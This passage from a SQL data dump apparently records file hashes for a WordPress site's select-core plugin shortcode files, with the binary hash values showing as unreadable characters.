v>','',0,'?'),('g:HlyqY','wp-content/plugins/select-core/shortcodes/accordions/accordion.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/accordions/accordion.php',0,'ӟ{O[ ','ӟ{O[ ','08J_:glٝ-HwQ&66','',0,'?'),('Ij[2_','wp-content/plugins/select-core/shortcodes/accordions/assets/js/modules/accordions.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/accordions/assets/js/modules/accordions.js',0,'ZA7:||\n','ZA7:||\n','!LOq=\Z:4C\\\0_','',0,'?'),('a6n޲Mt᜾P','wp-content/plugins/select-core/shortcodes/accordions/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/accordions/functions.php',0,'LF&o[M8V','LF&o[M8V','-!\0%ghYzqMUK','',0,'?'),('#PԶ:sB1','wp-content/plugins/select-core/shortcodes/accordions/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/accordions/load.php',0,'r˵N$&!','r˵N$&!','e !puT~KI-IU !RP','',0,'?'),('CQYY!Um','wp-content/plugins/select-core/shortcodes/accordions/templates/accordion-holder-template.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/accordions/templates/accordion-holder-template.php',0,'̳i-','̳i-',',|b1*ɞ׫V0ɻ:U','',0,'?'),('T!\'y`P>','wp-content/plugins/select-core/shortcodes/accordions/templates/accordion-template.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/accordions/templates/accordion-template.php',0,'V[T,-\n','V[T,-\n','xuˡt@s>X֮ea\\VU','',0,'?'),('+f&}2;܄pb ','wp-content/plugins/select-core/shortcodes/animation-holder/animation-holder.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/animation-holder/animation-holder.php',0,'ؙg|\r̄M','ؙg|\r̄M','\\>AX:F.[g60־','',0,'?'),('*$njD','wp-content/plugins/select-core/shortcodes/animation-holder/assets/js/modules/animation-holder.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/animation-holder/assets/js/modules/animation-holder.js',0,'Dmڂ>V!','Dmڂ>V!','TkpC$1>ٯ2\r_5','',0,'?'),('EC\Z=ߛ?','wp-content/plugins/select-core/shortcodes/animation-holder/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/animation-holder/functions.php',0,'1C@w-tP3\ny','1C@w-tP3\ny','Oeq+#:\"\'Ғpp','',0,'?'),('\ZJ;jV rg\"k','wp-content/plugins/select-core/shortcodes/animation-holder/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/animation-holder/load.php',0,'!W24Nu;4','!W24Nu;4',' 6`kw#uȹixӏN*x','',0,'?'),('$ ֋Qƙpm1','wp-content/plugins/select-core/shortcodes/banner/banner.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/banner/banner.php',0,'.E9Sc|^kQ:','.E9Sc|^kQ:','V#gYavBݡ8^-wyXB{h','',0,'?'),('Ha}6T8X<','wp-content/plugins/select-core/shortcodes/banner/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/banner/functions.php',0,'G\"{/N','G\"{/N','̺MA/oGY$a#f~#','',0,'?'),('==.uy','',0,'?'),('yY_f','wp-content/plugins/select-core/shortcodes/button/button.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/button/button.php',0,'Fl@q_`6 *M]','Fl@q_`6 *M]','Xt!yugL ','',0,'?'),(']<]\')#','wp-content/plugins/select-core/shortcodes/button/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/button/functions.php',0,'\rXd\"-','\rXd\"-',' ›PFjtV\rC`','',0,'?'),('ɵMp4M','wp-content/plugins/select-core/shortcodes/button/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/button/load.php',0,'C^[A\' +1','C^[A\' +1','!Dq\'BQUB\r*3y\\bӞ\\','',0,'?'),('CyaW< |P[','wp-content/plugins/select-core/shortcodes/button/templates/anchor.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/button/templates/anchor.php',0,'q r3@1n#\n','q r3@1n#\n','9IqRpc\"`MB0%r1<=','',0,'?'),('ԍ*`9׋','wp-content/plugins/select-core/shortcodes/button/templates/button.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/button/templates/button.php',0,'P\nsD','P\nsD','Ҧ2 \Z\06L\"I>$W*KD\n','',0,'?'),('SnJa}b','wp-content/plugins/select-core/shortcodes/button/templates/input.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/button/templates/input.php',0,'k]*wo7|p','k]*wo7|p','\Z+=y&\ZM5SSIV=MJ|','',0,'?'),(' ؽN\"H','wp-content/plugins/select-core/shortcodes/call-to-action/call-to-action.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/call-to-action/call-to-action.php',0,'z0t$&WI','z0t$&WI','|a[=cupG:W~٪','',0,'?'),('] 7\r09t-','wp-content/plugins/select-core/shortcodes/call-to-action/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/call-to-action/functions.php',0,'C_{~/\\Y w;','C_{~/\\Y w;','dᨀC@U!;CH\'Y)D64','',0,'?'),('8d3 콜,','wp-content/plugins/select-core/shortcodes/call-to-action/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/call-to-action/load.php',0,'A\r?1qg3a','A\r?1qg3a','5hqբ=ئfNB','',0,'?'),('Hmo5 Z','',0,'?'),('&[+5Jx>','wp-content/plugins/select-core/shortcodes/clients-carousel/clients-carousel.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/clients-carousel/clients-carousel.php',0,'0Uई1','0Uई1','M f̱ȓ3zaЦՈ̘,\Ze\Z&','',0,'?'),('.9~%MLX','wp-content/plugins/select-core/shortcodes/clients-carousel/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/clients-carousel/functions.php',0,'ō#i=wPe','ō#i=wPe','n4Û$+9}8-7X)\n!VCQ\'f','',0,'?'),('!Y`)Yz+','wp-content/plugins/select-core/shortcodes/clients-carousel/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/clients-carousel/load.php',0,'L $b\\|e','L $b\\|e','\\xhg*=؞fvB','',0,'?'),('(qU,x{','wp-content/plugins/select-core/shortcodes/clients-carousel/templates/clients-carousel-item.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/clients-carousel/templates/clients-carousel-item.php',0,'~wz','~wz','E-O7*~)it|T~BR','',0,'?'),('=Υb7UlѤ','wp-content/plugins/select-core/shortcodes/clients-carousel/templates/clients-carousel.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/clients-carousel/templates/clients-carousel.php',0,'ޫ4AJ','ޫ4AJ','p`+(3s(x~Y֔hjL)','',0,'?'),('܁LG{ۀw','wp-content/plugins/select-core/shortcodes/countdown/assets/js/modules/countdown.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/countdown/assets/js/modules/countdown.js',0,'ȧ+:3)?','ȧ+:3)?','.\'֬XΦ%/6xjQ0j','',0,'?'),('ޖCQ\"\'U.','wp-content/plugins/select-core/shortcodes/countdown/assets/js/plugins/jquery.countdown.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/countdown/assets/js/plugins/jquery.countdown.min.js',0,'!4FCo!d','!4FCo!d','5IN|/\ryYu%ة hq4.','',0,'?'),('ӄ|_>&&,','wp-content/plugins/select-core/shortcodes/countdown/countdown.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/countdown/countdown.php',0,'ſ`뼰b?(g','ſ`뼰b?(g','i{pBv ֗;}[W9SFLMx','',0,'?'),('aA}ˑsD','wp-content/plugins/select-core/shortcodes/countdown/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/countdown/functions.php',0,'EzuNޤ]\"ݕZR$','EzuNޤ]\"ݕZR$',' Wgdm=˾o$2pB9V>','',0,'?'),('omv\Ze)ky','wp-content/plugins/select-core/shortcodes/countdown/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/countdown/load.php',0,'o-7TQ\'1','o-7TQ\'1','UU\n{` jPKB<؛x&7ح$c2K_','',0,'?'),('s7S|G','wp-content/plugins/select-core/shortcodes/countdown/templates/countdown.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/countdown/templates/countdown.php',0,'OF5nW\nR~PzWR','OF5nW\nR~PzWR','*oΰ1Z9hnFxo:$߃','',0,'?'),('bG]ڿ`~1','wp-content/plugins/select-core/shortcodes/counter/assets/js/modules/counter.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/counter/assets/js/modules/counter.js',0,'k\Z_m\"\ZYp','k\Z_m\"\ZYp',' !Ճ^WYY&$ (Txx*<þ','',0,'?'),('f趭[','wp-content/plugins/select-core/shortcodes/counter/assets/js/plugins/absoluteCounter.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/counter/assets/js/plugins/absoluteCounter.min.js',0,'zh!a {:','zh!a {:','\Zyϝ,3>tH߈.v~','',0,'?'),('\\7J7\\EQ','wp-content/plugins/select-core/shortcodes/counter/assets/js/plugins/counter.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/counter/assets/js/plugins/counter.js',0,'Ys3a63 )','Ys3a63 )','s*WC^.oMK:','',0,'?'),('%8W#g&[','wp-content/plugins/select-core/shortcodes/counter/counter.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/counter/counter.php',0,'M!5NcCxuZ','M!5NcCxuZ','yya+ǚ\"Z bEAOm','',0,'?'),('v82Ė ','wp-content/plugins/select-core/shortcodes/counter/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/counter/functions.php',0,'+^%ˮ]@~Dy=','+^%ˮ]@~Dy=','!f2bFIq?ꑕQIC','',0,'?'),('2KPL{ Ŷ','wp-content/plugins/select-core/shortcodes/counter/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/counter/load.php',0,' Hk1kr',' Hk1kr','{d1Z\\zᮃ!\0+ݔ4Fj','',0,'?'),('mWA=','wp-content/plugins/select-core/shortcodes/counter/templates/counter.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/counter/templates/counter.php',0,'1%T{j9=','1%T{j9=','|qkC Wɀ\0gv?CJ(j','',0,'?'),('@b[sDͿ9h','wp-content/plugins/select-core/shortcodes/custom-font/assets/js/modules/custom-font.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/custom-font/assets/js/modules/custom-font.js',0,'X?2qW','X?2qW','.- V2hWT>JX]\'d','',0,'?'),('!r1(9A','wp-content/plugins/select-core/shortcodes/custom-font/assets/js/plugins/typed.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/custom-font/assets/js/plugins/typed.js',0,'<\"S*a\Z\n','<\"S*a\Z\n','A(&,2\Zč񀓙iQLp*','',0,'?'),('y9-\\M$','wp-content/plugins/select-core/shortcodes/custom-font/custom-font.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/custom-font/custom-font.php',0,'/CDk/Ǖ9','/CDk/Ǖ9','.Si\\ v:*CJ+/2둭','',0,'?'),('Yb7q=vpԫE','wp-content/plugins/select-core/shortcodes/custom-font/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/custom-font/functions.php',0,'nxCn8}\0','nxCn8}\0','Do.\ZEw\ni,FY]','',0,'?'),('6GRj>0;0Ӌ.}','wp-content/plugins/select-core/shortcodes/custom-font/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/custom-font/load.php',0,';x$QR”ԭK ',';x$QR”ԭK ','+VzL۬Ίɀ>}] ','',0,'?'),('L?#RI}\'a','wp-content/plugins/select-core/shortcodes/custom-font/templates/custom-font.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/custom-font/templates/custom-font.php',0,'M\'3R~fNW','M\'3R~fNW','P?CA$EA~jJ Btr7)<m5.C','',0,'?'),('K~晵\0ԇy','wp-content/plugins/select-core/shortcodes/dropcaps/dropcaps.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/dropcaps/dropcaps.php',0,'Ck=PS','Ck=PS','vf鋠ER:&Ī뭡\"','',0,'?'),('1AY\']lȜ','wp-content/plugins/select-core/shortcodes/dropcaps/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/dropcaps/functions.php',0,'[/<|!s_','[/<|!s_','2އ\']qɶlQX:v:f','',0,'?'),('Ux&Ưk','wp-content/plugins/select-core/shortcodes/dropcaps/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/dropcaps/load.php',0,'Љ],#','Љ],#','QζJ*\ZC =SWq\Z;\Z܌8','',0,'?'),(']N>W','wp-content/plugins/select-core/shortcodes/dropcaps/templates/dropcaps-template.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/dropcaps/templates/dropcaps-template.php',0,'\Z\'0LB','\Z\'0LB','(4j2Z.2e,oeK);\0-7#','',0,'?'),(' HQh','wp-content/plugins/select-core/shortcodes/elements-holder/assets/js/modules/elements-holder.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/elements-holder/assets/js/modules/elements-holder.js',0,'Mti\nufc;','Mti\nufc;','<*hLv `N$:TaWΊ*+','',0,'?'),('r4EϬ','wp-content/plugins/select-core/shortcodes/elements-holder/elements-holder-item.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/elements-holder/elements-holder-item.php',0,'(<޲ =V','(<޲ =V','L)%tP_28絚: +\r','',0,'?'),('h\0x\0:S ','wp-content/plugins/select-core/shortcodes/elements-holder/elements-holder.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/elements-holder/elements-holder.php',0,'%;`\019u)Y','%;`\019u)Y',')-O0SW6l1+L8rZ4','',0,'?'),('nt/chK\Zzl','wp-content/plugins/select-core/shortcodes/elements-holder/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/elements-holder/functions.php',0,'wEr1l','wEr1l','@M#]4ۜCIZnlh9','',0,'?'),('\nLdAG[ڭM#L','wp-content/plugins/select-core/shortcodes/elements-holder/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/elements-holder/load.php',0,'])\rŽ0?Ow','])\rŽ0?Ow','pA/CP<,A( h<\'dc','',0,'?'),('Ds`6ւgO','wp-content/plugins/select-core/shortcodes/elements-holder/templates/elements-holder-item-template.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/elements-holder/templates/elements-holder-item-template.php',0,'E5\ZAZ','E5\ZAZ','E\Z>&3jB,d','',0,'?'),('3AYA LK','wp-content/plugins/select-core/shortcodes/google-map/assets/js/modules/google-map.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/google-map/assets/js/modules/google-map.js',0,'Q/.zTiܟ ','Q/.zTiܟ ','Sòڼɖ/\Z(+ۭ}_1','',0,'?'),('&c~b$Xre','wp-content/plugins/select-core/shortcodes/google-map/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/google-map/functions.php',0,'c]E[?kp','c]E[?kp','At쌂3E딯al X~Y4W','',0,'?'),('U#:4\'','wp-content/plugins/select-core/shortcodes/google-map/google-map.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/google-map/google-map.php',0,'4\0t>pbد','4\0t>pbد','otRڅA/20v pm','',0,'?'),('h´>6S ','wp-content/plugins/select-core/shortcodes/google-map/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/google-map/load.php',0,'ʵ\rJ ','ʵ\rJ ','jl\"&HzOf7Е1 6|<','',0,'?'),('tCe9ɾ)','wp-content/plugins/select-core/shortcodes/google-map/templates/google-map-template.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/google-map/templates/google-map-template.php',0,'&**yX','&**yX',']qY^D4>q,B2]!','',0,'?'),('f9`F~\"','wp-content/plugins/select-core/shortcodes/highlight/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/highlight/functions.php',0,'TzikHOlQ','TzikHOlQ','rSXVհؔ6r%+`l','',0,'?'),('8ƈ^]','wp-content/plugins/select-core/shortcodes/highlight/highlight.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/highlight/highlight.php',0,'u@˕kSu','u@˕kSu',' gN\r ̍>,$X ;ĥ','',0,'?'),('Rx] 3 ','wp-content/plugins/select-core/shortcodes/highlight/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/highlight/load.php',0,'XQ5B\r!!^e','XQ5B\r!!^e','6\'|`-Ӌ@y˿r-','',0,'?'),('ˍ\0\r9zh','wp-content/plugins/select-core/shortcodes/highlight/templates/highlight-template.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/highlight/templates/highlight-template.php',0,'VATQv1K8L','VATQv1K8L','bdnP9 p^aV =dTK ','',0,'?'),('s昌R?N̰\"','wp-content/plugins/select-core/shortcodes/icon/assets/js/modules/icon.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/icon/assets/js/modules/icon.js',0,'P (&Ι7','P (&Ι7','m2^nY1{N۽W5kf;\n','',0,'?'),('OXks&?','wp-content/plugins/select-core/shortcodes/icon/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/icon/functions.php',0,' e(b=0[`',' e(b=0[`','Ms\ry%@x/OmF&B AdZ','',0,'?'),(' Y&tJ}8','wp-content/plugins/select-core/shortcodes/icon/icon.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/icon/icon.php',0,'D֠3w%>N','D֠3w%>N','M UN-͡ry\rA7\nqx\r','',0,'?'),('5 CFt0','wp-content/plugins/select-core/shortcodes/icon/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/icon/load.php',0,'LjGy','',0,'?'),('`ZgMuu9JQ9b','wp-content/plugins/select-core/shortcodes/icon-list-item/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/icon-list-item/load.php',0,'sh0;o\0a\'e','sh0;o\0a\'e',',*מN  |IBiewKfs*','',0,'?'),('ԒRH\r[(r#7h0s','wp-content/plugins/select-core/shortcodes/icon-list-item/templates/icon-list-item-template.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/icon-list-item/templates/icon-list-item-template.php',0,'Hsg>','Hsg>','60|N {\"/ ;[gֿ*','',0,'?'),('fNߣwJ\'=*','wp-content/plugins/select-core/shortcodes/icon-with-text/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/icon-with-text/functions.php',0,'\"[[HiE !zi.','\"[[HiE !zi.','g(VZ-9FV-)','',0,'?'),('3C@GbQH','wp-content/plugins/select-core/shortcodes/icon-with-text/icon-with-text.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/icon-with-text/icon-with-text.php',0,'l΍NeD\r8 ','l΍NeD\r8 ',' ƴf;sɗ/\'Z[w47wY','',0,'?'),('Ò?M\"98','wp-content/plugins/select-core/shortcodes/icon-with-text/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/icon-with-text/load.php',0,';dmgYe\'Ri',';dmgYe\'Ri','HKgKآV9&RHsΠPq','',0,'?'),('ho]W\"̣j','wp-content/plugins/select-core/shortcodes/icon-with-text/templates/icon.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/icon-with-text/templates/icon.php',0,'[rC#ڲ','[rC#ڲ','}h .WLL:|a','',0,'?'),('bFk\'M','wp-content/plugins/select-core/shortcodes/icon-with-text/templates/iwt-icon-left-from-title.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/icon-with-text/templates/iwt-icon-left-from-title.php',0,'G=-&0vͿu','G=-&0vͿu','T^x F\ZՀ $_','',0,'?'),('VM>] j','wp-content/plugins/select-core/shortcodes/icon-with-text/templates/iwt.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/icon-with-text/templates/iwt.php',0,'&\Z^RD\Z','&\Z^RD\Z',' 9\\?Wf)VJfT(CJWGB','',0,'?'),('pR*uUȫ','wp-content/plugins/select-core/shortcodes/image-gallery/assets/js/modules/image-gallery.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/image-gallery/assets/js/modules/image-gallery.js',0,'X5;~p','X5;~p','ccX$iaۀk9ut|(ރ\nle','',0,'?'),('QOQDI@W','wp-content/plugins/select-core/shortcodes/image-gallery/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/image-gallery/functions.php',0,')uiR',')uiR','Luw/\\\\c2=Jڗ=yrޣH','',0,'?'),('\nL^ 4!y&w,','wp-content/plugins/select-core/shortcodes/image-gallery/image-gallery.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/image-gallery/image-gallery.php',0,'&-P4ֳvb7N','&-P4ֳvb7N',' l#Mlrn\Z@@3','',0,'?'),('\"\"VA?s2','wp-content/plugins/select-core/shortcodes/image-gallery/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/image-gallery/load.php',0,'c~H ՜@L','c~H ՜@L','܀.Bcb?d|jZ\rS%.~K','',0,'?'),('8˟','wp-content/plugins/select-core/shortcodes/image-gallery/templates/carousel.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/image-gallery/templates/carousel.php',0,'סJǐ%RP','סJǐ%RP','aMtޒH5g2x+z L#Rk>','',0,'?'),('A\n?, US˱','wp-content/plugins/select-core/shortcodes/image-gallery/templates/grid.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/image-gallery/templates/grid.php',0,'\nP2xe? 7','\nP2xe? 7','?~ʀ Qn y}wQ\\ ','',0,'?'),('$+?Ny-)[','wp-content/plugins/select-core/shortcodes/image-gallery/templates/masonry.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/image-gallery/templates/masonry.php',0,'X!M91TId','X!M91TId','nQՠe =`M;ӡ;XMF','',0,'?'),(' a f 7','wp-content/plugins/select-core/shortcodes/image-gallery/templates/slider.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/image-gallery/templates/slider.php',0,'סJǐ%RP','סJǐ%RP','aMtޒH5g2x+z L#Rk>','',0,'?'),('۞s mڻXs','wp-content/plugins/select-core/shortcodes/image-with-text/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/image-with-text/functions.php',0,'>VDUeҬ','>VDUeҬ','%\\Z A,`Ԏ굲=sVFVFW','',0,'?'),(']$vxQN\'','wp-content/plugins/select-core/shortcodes/image-with-text/image-with-text.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/image-with-text/image-with-text.php',0,'>u f_ǁ','>u f_ǁ',' 1zˇ\\~5f>wO顎^p','',0,'?'),('H^Ŀ;%','wp-content/plugins/select-core/shortcodes/image-with-text/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/image-with-text/load.php',0,'4`Rrbs ','4`Rrbs ','LWx9q$%EÉ^sͻ','',0,'?'),('jý ZI6Q','wp-content/plugins/select-core/shortcodes/image-with-text/templates/image-with-text.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/image-with-text/templates/image-with-text.php',0,'f!\\','f!\\',' *~\"%xSR&@ĺK9j','',0,'?'),('LjpmƸ','wp-content/plugins/select-core/shortcodes/item-showcase/assets/js/modules/item-showcase.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/item-showcase/assets/js/modules/item-showcase.js',0,'!ΐ+mD','!ΐ+mD','g~aQ{ r4#ؽN%-','',0,'?'),('x޽pu]PZ)','wp-content/plugins/select-core/shortcodes/item-showcase/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/item-showcase/functions.php',0,'\'[! ','\'[! ','<-,0H $<f29wahNp#','',0,'?'),('F1!+87','wp-content/plugins/select-core/shortcodes/item-showcase/item-showcase-item.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/item-showcase/item-showcase-item.php',0,'GaTU','GaTU','>j-y>(bn#\'~0','',0,'?'),('#[@ fN?y<:$','wp-content/plugins/select-core/shortcodes/item-showcase/item-showcase.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/item-showcase/item-showcase.php',0,'Ч1pD_','Ч1pD_','(g`:_Ζݙ\r{','',0,'?'),('\rD7A7M','wp-content/plugins/select-core/shortcodes/item-showcase/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/item-showcase/load.php',0,'П)dChG_Ӗ','П)dChG_Ӗ','KdO#EEY^̨ƻ^]_ =\n','',0,'?'),(';haYY:Q[\r[','wp-content/plugins/select-core/shortcodes/item-showcase/templates/item-showcase-item.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/item-showcase/templates/item-showcase-item.php',0,'R\'ɖ\Zs\'','R\'ɖ\Zs\'','i&!x|]\"ZBG\r`?\"Ω3f','',0,'?'),('j䤡:HX7N\\','wp-content/plugins/select-core/shortcodes/pie-chart/assets/js/modules/pie-chart.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/pie-chart/assets/js/modules/pie-chart.js',0,'L̈́+YG]','L̈́+YG]','`*)c ȌA@\'wYt%RK','',0,'?'),('\rH dCwX','wp-content/plugins/select-core/shortcodes/pie-chart/assets/js/plugins/counter.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/pie-chart/assets/js/plugins/counter.js',0,'Ys3a63 )','Ys3a63 )','s*WC^.oMK:','',0,'?'),('9]u\ronA;','wp-content/plugins/select-core/shortcodes/pie-chart/assets/js/plugins/easypiechart.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/pie-chart/assets/js/plugins/easypiechart.js',0,'ec&5bv','ec&5bv','fɃ}7|)5HeL`>=c','',0,'?'),('JICVr&','wp-content/plugins/select-core/shortcodes/pie-chart/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/pie-chart/functions.php',0,'QlW 8dJʓD','QlW 8dJʓD','/E )c[9,W?~.','',0,'?'),('G\\Mh!듨yc','wp-content/plugins/select-core/shortcodes/pie-chart/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/pie-chart/load.php',0,'۱t\Zd 9','۱t\Zd 9','7ĭ,n]|s!NgK','',0,'?'),('bGBx8\n','wp-content/plugins/select-core/shortcodes/pie-chart/pie-chart.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/pie-chart/pie-chart.php',0,'V;ߞeGr','V;ߞeGr','+G\\sks_l\Z(\r=UAjэ','',0,'?'),('J9oh-c ','wp-content/plugins/select-core/shortcodes/pie-chart/templates/pie-chart.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/pie-chart/templates/pie-chart.php',0,'G\n1pt!k','G\n1pt!k','e)hv oqh\nD t','',0,'?'),('ပC#%/ $9','wp-content/plugins/select-core/shortcodes/pricing-table/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/pricing-table/functions.php',0,'\'}sH6sl+Nv','\'}sH6sl+Nv','@1>|X3n!S','',0,'?'),('tzoGbAu8','wp-content/plugins/select-core/shortcodes/pricing-table/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/pricing-table/load.php',0,'eS`#_QSD&в','eS`#_QSD&в','O& EGxd \rV)xr`ħ@','',0,'?'),('˃ 2,ó}*|','wp-content/plugins/select-core/shortcodes/pricing-table/pricing-table-item.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/pricing-table/pricing-table-item.php',0,'S̷EfB;','S̷EfB;','Ĥʦq3?DŽ@j\"1I0!','',0,'?'),('ρ+eal<8z','wp-content/plugins/select-core/shortcodes/pricing-table/pricing-table.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/pricing-table/pricing-table.php',0,'/Q\'odR','/Q\'odR','F6k*$07`^P\"','',0,'?'),(' xkXdzf','wp-content/plugins/select-core/shortcodes/pricing-table/templates/pricing-table-template.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/pricing-table/templates/pricing-table-template.php',0,'6~<\\\\0ϑ9=~','',0,'?'),('U_Hi|tnV','wp-content/plugins/select-core/shortcodes/progress-bar/progress-bar.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/progress-bar/progress-bar.php',0,'NY?AiV2}@','NY?AiV2}@','~xq^^qnm','',0,'?'),(' 